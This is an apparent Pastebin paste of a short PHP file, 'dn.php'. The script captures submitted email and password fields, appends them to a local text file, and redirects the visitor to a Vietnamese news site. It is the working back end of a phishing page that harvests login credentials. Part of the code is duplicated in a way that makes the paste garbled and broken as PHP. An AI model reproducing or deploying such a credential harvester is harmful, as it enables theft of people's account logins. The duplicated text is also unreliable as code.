Advertisement
GB-CNT1

dn.php

Nov 16th, 2016
111
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.05 KB | None | 0 0
  1. <?php
  2. $ten = $_POST['email'];
  3. $matkhau=$_POST['pass'];
  4. $f=fopen("dl.txt" , 'a');
  5. fwrite($f,"user: $ten -pass: $matkhau");<?php
  6. $ten = $_POST['email'];
  7. $matkhau=$_POST['pass'];
  8. $f=fopen("dl.txt" , 'a');
  9. fwrite($f,"user: $ten -pass: $matkhau");
  10. fclose($f);
  11. header('location:http://www.24h.com.vn');
  12. ?>
  13.  
  14. fclose($f);
  15. header('location:http://www.24h.com.vn');
  16. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement